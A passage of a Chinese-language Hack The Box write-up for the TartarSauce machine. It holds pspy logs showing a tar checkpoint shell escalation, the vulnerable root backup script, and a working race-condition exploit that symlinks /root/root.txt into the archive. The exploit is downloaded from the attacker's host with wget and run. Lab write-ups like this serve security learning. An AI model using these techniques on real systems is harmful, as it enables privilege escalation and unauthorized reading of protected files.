    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/01/06 11:08:54 CMD: UID=1000  PID=4184   | ./pspy32 
2024/01/06 11:08:54 CMD: UID=1000  PID=4030   | /bin/bash 
2024/01/06 11:08:54 CMD: UID=1000  PID=4029   | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash                                                                             
2024/01/06 11:08:54 CMD: UID=0     PID=4028   | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash                                                               
2024/01/06 11:08:54 CMD: UID=0     PID=4013   | 
2024/01/06 11:08:54 CMD: UID=0     PID=3606   | 
2024/01/06 11:08:54 CMD: UID=33    PID=3491   | /bin/bash 
2024/01/06 11:08:54 CMD: UID=33    PID=3490   | python3 -c import pty;pty.spawn("/bin/bash") 
2024/01/06 11:08:54 CMD: UID=33    PID=3489   | /bin/sh -i 
2024/01/06 11:08:54 CMD: UID=33    PID=3485   | sh -c uname -a; w; id; /bin/sh -i 
2024/01/06 11:08:54 CMD: UID=33    PID=3062   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=3061   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2808   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2807   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=0     PID=2785   | 
2024/01/06 11:08:54 CMD: UID=33    PID=2508   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2378   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2351   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2206   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=33    PID=2202   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=0     PID=1766   | 
2024/01/06 11:08:54 CMD: UID=33    PID=1393   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=0     PID=1386   | /usr/sbin/apache2 -k start 
2024/01/06 11:08:54 CMD: UID=0     PID=1309   | /sbin/agetty --noclear tty1 linux 
2024/01/06 11:08:54 CMD: UID=107   PID=1278   | /usr/sbin/mysqld 
2024/01/06 11:08:54 CMD: UID=0     PID=1267   | /sbin/iscsid 
2024/01/06 11:08:54 CMD: UID=0     PID=1266   | /sbin/iscsid 
2024/01/06 11:08:54 CMD: UID=0     PID=1099   | /usr/lib/policykit-1/polkitd --no-debug 
2024/01/06 11:08:54 CMD: UID=0     PID=1083   | /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog                                                                       
2024/01/06 11:08:54 CMD: UID=104   PID=952    | /usr/sbin/rsyslogd -n 
2024/01/06 11:08:54 CMD: UID=0     PID=951    | /usr/bin/lxcfs /var/lib/lxcfs/ 
2024/01/06 11:08:54 CMD: UID=1     PID=950    | /usr/sbin/atd -f 
2024/01/06 11:08:54 CMD: UID=0     PID=949    | /usr/lib/accountsservice/accounts-daemon 
2024/01/06 11:08:54 CMD: UID=0     PID=948    | /usr/sbin/acpid 
2024/01/06 11:08:54 CMD: UID=0     PID=947    | /usr/lib/snapd/snapd 
2024/01/06 11:08:54 CMD: UID=0     PID=946    | /usr/bin/vmtoolsd 
2024/01/06 11:08:54 CMD: UID=0     PID=942    | /usr/sbin/cron -f 
2024/01/06 11:08:54 CMD: UID=0     PID=941    | /lib/systemd/systemd-logind 
2024/01/06 11:08:54 CMD: UID=108   PID=925    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation                                                                
2024/01/06 11:08:54 CMD: UID=100   PID=798    | /lib/systemd/systemd-timesyncd 
2024/01/06 11:08:54 CMD: UID=0     PID=761    | 
2024/01/06 11:08:54 CMD: UID=0     PID=511    | 
2024/01/06 11:08:54 CMD: UID=0     PID=507    | /sbin/lvmetad -f 
2024/01/06 11:08:54 CMD: UID=0     PID=504    | /lib/systemd/systemd-udevd 
2024/01/06 11:08:54 CMD: UID=0     PID=498    | 
2024/01/06 11:08:54 CMD: UID=0     PID=497    | 
2024/01/06 11:08:54 CMD: UID=0     PID=496    | 
2024/01/06 11:08:54 CMD: UID=0     PID=495    | 
2024/01/06 11:08:54 CMD: UID=0     PID=488    | /lib/systemd/systemd-journald 
2024/01/06 11:08:54 CMD: UID=0     PID=438    | 
2024/01/06 11:08:54 CMD: UID=0     PID=437    | 
2024/01/06 11:08:54 CMD: UID=0     PID=6      | 
2024/01/06 11:08:54 CMD: UID=0     PID=4      | 
2024/01/06 11:08:54 CMD: UID=0     PID=2      | 
2024/01/06 11:08:54 CMD: UID=0     PID=1      | /sbin/init 
2024/01/06 11:09:01 CMD: UID=0     PID=4194   | /bin/sh -c   [ -x /usr/lib/php/sessionclean ] && /usr/lib/php/sessionclean                                                                                
2024/01/06 11:09:01 CMD: UID=0     PID=4193   | /bin/sh -c   [ -x /usr/lib/php/sessionclean ] && /usr/lib/php/sessionclean                                                                                
2024/01/06 11:09:01 CMD: UID=0     PID=4192   | /usr/sbin/CRON -f 
2024/01/06 11:09:01 CMD: UID=0     PID=4198   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4197   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4196   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4195   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4199   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4200   | /bin/sh /usr/sbin/phpquery -V 
2024/01/06 11:09:01 CMD: UID=0     PID=4203   | /bin/sh /usr/sbin/phpquery -V 
2024/01/06 11:09:01 CMD: UID=0     PID=4202   | /bin/sh /usr/sbin/phpquery -V 
2024/01/06 11:09:01 CMD: UID=0     PID=4206   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4205   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4209   | sed -ne s/^session\.save_handler=\(.*\)$/\1/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4208   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4207   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4212   | sed -ne s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4211   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4210   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4215   | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4214   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4213   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4218   | sed -e s,@VERSION@,7.0, 
2024/01/06 11:09:01 CMD: UID=0     PID=4217   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4216   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4219   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4222   | sed -ne s/^session\.save_handler=\(.*\)$/\1/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4221   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4220   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4225   | sed -ne s/^session\.save_path=\(.*;\)\?\(.*\)$/\2/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4224   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4223   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4228   | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p 
2024/01/06 11:09:01 CMD: UID=0     PID=4227   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4226   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4231   | sed -e s,@VERSION@,7.0, 
2024/01/06 11:09:01 CMD: UID=0     PID=4230   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:01 CMD: UID=0     PID=4229   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:02 CMD: UID=0     PID=4233   | /bin/sh -e /usr/lib/php/sessionclean 
2024/01/06 11:09:25 CMD: UID=0     PID=4248   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4247   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4246   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4245   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4244   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4243   | cut -d  -f1 
2024/01/06 11:09:25 CMD: UID=0     PID=4242   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4241   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4240   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4239   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4238   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4237   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4236   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4235   | /lib/systemd/systemd-udevd 
2024/01/06 11:09:25 CMD: UID=0     PID=4234   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4251   | seq 72 
2024/01/06 11:09:25 CMD: UID=0     PID=4250   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4249   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4252   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4253   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4254   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4255   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4256   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4257   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4258   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4259   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4260   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4261   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4262   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4263   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4264   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4265   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4266   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4267   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4268   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4269   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4270   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4271   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4272   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4273   | 
2024/01/06 11:09:25 CMD: UID=0     PID=4274   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4275   | 
2024/01/06 11:09:25 CMD: UID=0     PID=4276   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4277   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4278   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4279   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4280   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4281   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4282   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4283   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4284   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4285   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4286   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4287   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4288   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4289   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4290   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4291   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4292   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4293   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4294   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4295   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4296   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4297   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4298   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4299   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4300   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4301   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4302   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4303   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4304   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4305   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4307   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4308   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4309   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4310   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4311   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4312   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4313   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4314   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4315   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4316   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4317   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4318   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4319   | /usr/bin/printf - 
2024/01/06 11:09:25 CMD: UID=0     PID=4320   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4321   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4322   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4323   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4324   | /bin/date 
2024/01/06 11:09:25 CMD: UID=0     PID=4325   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4326   | /bin/rm -rf /var/tmp/. /var/tmp/.. /var/tmp/check 
2024/01/06 11:09:25 CMD: UID=0     PID=4329   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:25 CMD: UID=0     PID=4330   | /bin/sleep 30 
2024/01/06 11:09:25 CMD: UID=1000  PID=4333   | /bin/tar -zcvf /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 /var/www/html                                                                           
2024/01/06 11:09:26 CMD: UID=1000  PID=4334   | gzip 
2024/01/06 11:09:55 CMD: UID=0     PID=4339   | /bin/tar -zxvf /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 -C /var/tmp/check                                                                       
2024/01/06 11:09:56 CMD: UID=0     PID=4340   | gzip -d 
2024/01/06 11:09:56 CMD: UID=0     PID=4342   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:56 CMD: UID=0     PID=4341   | /bin/bash /usr/sbin/backuperer 
2024/01/06 11:09:56 CMD: UID=0     PID=4343   | /bin/mv /var/tmp/.0b0cb229ea075a1020b92de40ab51150413e5c08 /var/backups/onuma-www-dev.bak                                                                 
2024/01/06 11:09:56 CMD: UID=0     PID=4344   | /bin/rm -rf /var/tmp/check . .. 
2024/01/06 11:09:56 CMD: UID=0     PID=4345   |

23、发现了进程中,有一个进程比较疑似

/bin/bash /usr/sbin/backuperer

24、查看下该文件的内容吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
onuma@TartarSauce:/$ cat /usr/sbin/backuperer
cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
onuma@TartarSauce:/$

在上面的脚本中,/var/www/html 备份到/var/tmp,然后提取到/var/tmp/check/var/www/html。如果文件与当前 /var/www/html 目录不匹配,那么它们将以公开状态存储在服务器上 30 秒。在此期间,它们可以作为 root 读取和执行,因为它们是在该过程中由 root 写入的。通过这样做,我们可以将文件放入提取到文件系统的恶意存档中。

据我所知,没有办法利用这个盒子来获得 root shell。但我可以以 root 身份读取文件。

25、通过查看演练报告,知道了这个疑似脚本就是最后的关键,但是这个靶机是没办法获取到最终的root权限的,只能读取文件。

26、这里复制下演练报告里的poc代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

27、上传到靶机中,并尝试运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.88 - - [07/Jan/2024 00:16:20] code 404, message File not found
10.10.10.88 - - [07/Jan/2024 00:16:20] "GET /pco.sh HTTP/1.1" 404 -
10.10.10.88 - - [07/Jan/2024 00:16:41] "GET /poc.sh HTTP/1.1" 200 -

onuma@TartarSauce:~$ wget http://10.10.14.5:8080/poc.sh
wget http://10.10.14.5:8080/poc.sh
--2024-01-06 11:16:41--  http://10.10.14.5:8080/poc.sh
Connecting to 10.10.14.5:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 934 [text/x-sh]
Saving to: 'poc.sh'

poc.sh              100%[===================>]     934  --.-KB/s    in 0s      

2024-01-06 11:16:41 (81.5 MB/s) - 'poc.sh' saved [934/934]

onuma@TartarSauce:~$ 

onuma@TartarSauce:~$ chmod +x poc.sh
chmod +x poc.sh

onuma@TartarSauce:~$ ./poc.sh
./poc.sh
Waiting for archive filename to change...
File changed... copying here
tar: var/www/html/webservices/monstra-3.0.4/public/uploads/.empty: Cannot stat: Permission denied
tar: Exiting with failure status due to previous errors
rm: cannot remove '.b9374902e8709ee04befb67211a23156c94072be': No such file or directory
rm: cannot remove 'var/www/html/webservices/monstra-3.0.4/public/uploads/.empty': Permission denied
Waiting for new logs...
Only in /var/www/html/webservices/monstra-3.0.4: robots.txt
Only in /var/www/html/webservices/monstra-3.0.4: rss.php
Only in /var/www/html/webservices/monstra-3.0.4: sitemap.xml
Only in /var/www/html/webservices/monstra-3.0.4: storage
Only in /var/www/html/webservices/monstra-3.0.4: tmp
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Thu Jan 21 05:38:54 EST 2021
------------------------------------------------------------------------
/var/tmp/.379fe8e77f9f84a66b9a6df9a452d10499713829
Binary files /var/www/html/webservices/wp/.wp-config.php.swp and /var/tmp/check/var/www/html/webservices/wp/.wp-config.php.swp differ
tail: inotify resources exhausted
tail: inotify cannot be used, reverting to polling
------------------------------------------------------------------------
Integrity Check Error in backup last ran :  Sat Jan  6 11:20:01 EST 2024
------------------------------------------------------------------------
/var/tmp/.b9374902e8709ee04befb67211a23156c94072be
diff -r /var/www/html/robots.txt /var/tmp/check/var/www/html/robots.txt
1,7c1
< User-agent: *
< Disallow: /webservices/tar/tar/source/
< Disallow: /webservices/monstra-3.0.4/
< Disallow: /webservices/easy-file-uploader/
< Disallow: /webservices/developmental/
< Disallow: /webservices/phpmyadmin/
< 
---
> 3b1e9f541d6924b0983673e647c225ff
Only in /var/www/html/webservices/monstra-3.0.4/public/uploads: .empty

28、至此,当前靶机的flag信息,也被读取出来了

3b1e9f541d6924b0983673e647c225ff

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/138

打靶记
#shooting-range
TartarSauce-htb-writeup
https://sh1yan.top/2024/01/07/TartarSauce-htb-writeup/
作者
shiyan
发布于
2024年1月7日
许可协议